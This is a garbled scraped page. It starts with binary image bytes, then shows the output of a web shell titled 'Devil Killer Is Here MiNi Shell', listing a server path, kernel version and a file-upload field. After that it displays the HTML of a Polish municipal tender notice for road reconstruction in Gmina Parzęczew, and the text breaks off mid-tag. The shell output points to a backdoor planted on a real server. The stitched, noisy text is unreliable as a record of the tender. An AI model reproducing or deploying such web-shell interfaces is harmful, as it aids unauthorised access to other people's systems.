JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220128/0003975501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa układu komunikacyjnego na drogach gminnych nr 120276E, 120277E, 120289E wokół projektowanego zbiornika retencyjnego Tkaczewska Góra – etap I” w systemie zaprojektuj i wybuduj. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Parzęczew</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472057810</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Południowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Parzęczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@parzeczew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.parzeczew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa układu komunikacyjnego na drogach gminnych nr 120276E, 120277E, 120289E wokół projektowanego zbiornika retencyjnego Tkaczewska Góra – etap I” w systemie zaprojektuj i wybuduj. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f4651bcd-8018-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00039755</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033147/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa układu komunikacyjnego na drogach gminnych nr 120276E, 120277E, 120289E wokół projektowanego zbiornika retencyjnego Tkaczewska Góra – etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie współfinansowane z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych - edycja I </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/parzeczew <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/parzeczew</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">I. Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b.	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram,<br/>procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c.	zainstalowana dowolna przeglądarka internetowa inna niż Internet Explorer,<br/>d.	włączona obsługa JavaScript,<br/>e.	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f.	Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g.	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego<br/>z zegarem Głównego Urzędu Miar.<br/>II.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a. akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie<br/>zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. <br/>III.	Wymagania dotyczące formatu dokumentów oraz wymagania techniczne :<br/>1)	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) <br/>ze szczególnym wskazaniem na .pdf<br/>2)	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a.	.zip <br/>b.	.7Z<br/>3)	Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone<br/>nieskutecznie.<br/>4)	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem<br/>zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych<br/>w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>5)	Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację <br/>podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. <br/>6)	Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES.<br/>Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem<br/>podpisywanym.<br/>7)	Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować<br/>podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym <br/>i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. <br/>8)	Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował <br/>możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty.<br/>9)	Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie<br/>za pośrednictwem formularza “Wyślij wiadomość do zamawiającego”, nie za pośrednictwem<br/>adresu email.<br/>10)	Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>11)	Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się<br/>o udzielenie zamówienia publicznego i zachowaniem odpowiedniego odstępu czasu<br/>do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24 godziny przed terminem składania ofert/wniosków.<br/>12)	Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1. <br/>13)	Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie<br/>każdego ze skompresowanych plików. <br/>14)	Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>15)	Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików<br/>co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Wójt Gminy Parzęczew,<br/>z siedzibą ul. Południowa 1, 95-045 Parzęczew, telefon 42 / 718-60-66, fax 42 / 718-60-66, adres e-mail: sekretariat_ug@parzeczew.pl;<br/>2)	inspektorem ochrony danych osobowych w Gminie Parzęczew jest Pan Krzysztof Kawecki, adres e-mail: iod@parzeczew.pl, telefon 503-140-413;<br/>Przetwarzanie danych osobowych jest zgodne z prawem i spełnia warunki, o których mowa <br/>w art. 6 ust. 1 lit.<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego,<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana<br/>do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania,<br/>w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania<br/>o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa<br/>w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>2)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">R-g.271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 zadanie pn. Przebudowa dróg gminnych w miejscowości Tkaczewska Góra, Pustkowa<br/>Góra, Sokola Góra, Nowomłyny w systemie zaprojektuj i wybuduj<br/>Zamawiający posiada n/w programy funkcjonalno-użytkowe (dalej PFU), które określają<br/>wszystkie wymagania dotyczące sporządzenia projektu budowlanego, a także wykonania robót<br/>budowlanych w zakresie budowy infrastruktury drogowej z uwzględnieniem infrastruktury<br/>stanowiącej własność gestorów zewnętrznych:<br/>• PFU – przebudowa drogi gminnej nr 120276E w m. Sokola Góra, gmina Parzęczew<br/>• PFU – przebudowa drogi gminnej nr 120277E w m. Nowomłyny, gmina Parzęczew<br/>• PFU – Przebudowa mostu na rzece Bzurze oraz kontynuacja przebudowy drogi gminnej<br/>nr 120277E<br/>Natomiast na odcinek drogi Tkaczewska Góra – Pustkowa Góra, Zamawiający posiada projekt<br/>budowlany, bez pozwolenia na budowę – dostosowanie dokumentacji oraz uzyskanie<br/>pozwolenia na budowę należy do Wykonawcy. Zamawiający zwraca uwagę, że przy realizacji<br/>zadania Przebudowa mostu na rzece Bzurze oraz kontynuacja przebudowy drogi gminnej nr<br/>120277E należy uzyskać m. in. decyzję ZRID.<br/>Zamawiający posiada mapy do celów projektowych w skali 1:500, dla wszystkich objętych<br/>zamówieniem odcinków dróg – przyjęte do państwowego zasobu geodezyjno-kartograficznego<br/>w dniach 04.11.2020r., 20.12.2021r., 21.12.2021r. – w załączeniu.<br/>Zakres rzeczowy formuła „ZAPROJEKTUJ” obejmuje m.in.:<br/>Opracowanie projektu budowlanego dla w/w części wraz z uzyskaniem wszelkich uzgodnień,<br/>analiz, map, opracowań pomocniczych oraz niezbędnych decyzji.<br/>Wykonawca zobowiązany jest do uzyskania akceptacji Zamawiającego co do opracowanego<br/>Projektu budowlanego. Po zaakceptowaniu projektu przez Zamawiającego a przed<br/>przystąpieniem do robót budowlanych Wykonawca zobowiązany jest uzyskać na rzecz<br/>Zamawiającego decyzji administracyjnych umożliwiających rozpoczęcie i realizację robót lub<br/>zgłoszenia robót nie wymagających uzyskania takich decyzji.<br/>Całość dokumentacji należy wykonać zgodnie z przepisami Prawa budowlanego (w tym<br/>z przepisami wykonawczymi) oraz uzgodnić z Zamawiającym przed złożeniem ich do właściwych<br/>organów zatwierdzających i decyzyjnych.<br/>Dokumentacja projektowa powinna bazować na najnowszych rozwiązaniach technicznych<br/>minimalizujących koszty eksploatacji z uwzględnieniem założeń programu funkcjonalnoużytkowego.<br/>Uzgodnioną z Zamawiającym dokumentację należy przedłożyć w wersji elektronicznej<br/>Zamawiającemu w formacie zapisu .DOC, .PDF, .DXF, .DWG.<br/>Wykonawca, na każdym etapie opracowania dokumentacji, zobowiązany jest do konsultacji<br/>z przedstawicielami Zamawiającego istotnych, mających wpływ na koszty elementów, jakości<br/>i niezawodności funkcjonowania obiektów po ich zrealizowaniu, rozwiązań funkcjonalnych<br/>i konstrukcyjnych. Po zakończeniu projektowania, a przed złożeniem kompletnej dokumentacji<br/>w celu uzyskania niezbędnych decyzji administracyjnych, Wykonawca przedłoży taką<br/>dokumenta-cję Zamawiającemu, celem uzyskania pisemnego jej uzgodnienia.<br/>W ramach zamówienia Wykonawca przeniesie na rzecz Zamawiającego autorskie prawa<br/>majątkowe oraz prawo zezwalania na wykonywanie zależnego prawa autorskiego do przedmiotu<br/>zamówienia obejmującego wszystkie pola eksploatacji wskazane w art. 50 ustawy z dnia 4<br/>lutego 1994 r.<br/>o prawie autorskim i prawach pokrewnych (tj. Dz. U. z 2021 r. poz. 1062 ze zm.), co upoważnia<br/>Zamawiającego do wykorzystywania przedmiotu umowy na wszelkich polach eksploatacji<br/>niezbędnych z uwagi na jego przeznaczenie. Wykonawca wyraża zgodę na dokonywanie zmian<br/>w dokumentacji. Przeniesienie praw autorskich nie jest ograniczone czasowo ani terytorialnie.<br/>Wykonywanie czynności nadzoru autorskiego przez projektanta nad realizacją projektu wchodzi<br/>w zakres zamówienia.<br/>Zakres rzeczowy formuła „WYBUDUJ” obejmuje m.in.:<br/>- wykonanie wszelkich niezbędnych prac rozbiórkowych i demontażowych oraz wykonanie robót<br/>budowlanych zgodnie z powstałym i zatwierdzonym projektem budowalnym, warunkami<br/>określonymi w pozwoleniu na budowę (jeżeli takie jest wymagane) oraz innych decyzjach<br/>administracyjnych, przestrzegając zasad sztuki budowlanej i praktyki budowlanej, oraz zaleceń<br/>Za-mawiającego, a także zgodnie z obowiązującymi przepisami prawa;<br/>- sporządzenie i złożenie w terminie 14 dni przed rozpoczęciem robót „Harmonogramu Realizacji<br/>Robót wraz z kosztorysem”, i przedstawienie do zatwierdzenia przez Zamawiającego.<br/>Zamawiający zastrzega sobie prawo do wprowadzenia zmian w przedłożonym Harmonogramie<br/>Realizacji Robót. Złożenie przedmiotowego kosztorysu nie zmienia formy wynagrodzenia, jaką<br/>jest ryczałt;<br/>- zorganizowanie i przeprowadzenie niezbędnych prób, badań, odbiorów i zawiadomień<br/>w Powiatowym Inspektoracie Nadzoru Budowlanego.<br/>Przed podpisaniem umowy w przedmiotowym postępowaniu, wyłoniony Wykonawca złoży<br/>wypełniony i zatwierdzony przez Zamawiającego harmonogram rzeczowo-finansowy,<br/>stanowiący załącznik do tej umowy (na etapie składania ofert dokument nie jest składany), z<br/>podziałem\<br/>na dokumentację projektową i roboty budowlane.<br/>Wykonawcy są zobowiązani do kierowania się odpowiednimi normami z zakresu ochrony<br/>środowiska w trakcie wszystkich prac oraz ograniczenia do minimum szkodliwego oddziaływania<br/>w roślinności, glebie, wodach gruntowych, wodach powierzchniowych oraz w krajobrazie.<br/>Wykonawca jest zobowiązany zrealizować przedmiot zamówienia, spełniając wymagania ustawy<br/>Prawo budowlane oraz innych ustaw i rozporządzeń, Polskich norm, zasad wiedzy technicznej<br/>i sztuki budowlanej.<br/>Roboty budowlane należy wykonać zgodnie z obowiązującymi normami, sztuką budowlaną,<br/>przepisami BHP, ppoż. oraz poleceniami inspektora nadzoru inwestorskiego. Wykonawca<br/>na dzień odbioru robót przedstawi inwentaryzację geodezyjną powykonawczą złożoną w<br/>państwowym zasobie geodezyjno – kartograficznym.<br/>Wykonawca jest zobowiązany zrealizować przedmiot zamówienia z materiałów nowych,<br/>nieużywanych, których jakość winna odpowiadać wymogom wyrobów dopuszczonych<br/>do stosowania w budownictwie, zgodnie z art. 10 ustawy Prawo budowlane oraz wymaganiom<br/>określonym w projekcie budowlanym. Wykonawca bierze całkowitą odpowiedzialność<br/>za dostarczone przez siebie materiały, użyte do realizacji przedmiotu umowy. Wykonawca<br/>ma obowiązek na każde żądanie Zamawiającego przedstawić świadectwo jakości materiału,<br/>certyfikat na znak bezpieczeństwa, deklarację zgodności z Polską Normą.<br/>Okres gwarancji, którą udzieli Wykonawca na przedmiot zamówienia wynosi co najmniej<br/>36 miesięcy.<br/>Jeżeli warunki gwarancji jakości udzielonej przez producenta materiałów i urządzeń przewidują<br/>dłuższy okres gwarancji jakości niż gwarancja udzielona przez Wykonawcę – obowiązuje okres<br/>gwarancji w wymiarze równym okresowi gwarancji producenta.<br/>Wykonawca zobowiązany jest wskazać okres gwarancji w Formularzu Ofertowym stanowiącym<br/>załącznik nr 1 do SWZ. Szczegółowy opis w zakresie okresu gwarancji znajduje się w dziale XV<br/>– Kryterium Nr 2.<br/>2. Wykonawca na własny koszt zatrudni kierownika budowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45221111-3 - Roboty budowlane w zakresie mostów drogowych</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie podlegają nieodrzucone oferty według kryteriów określonych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span 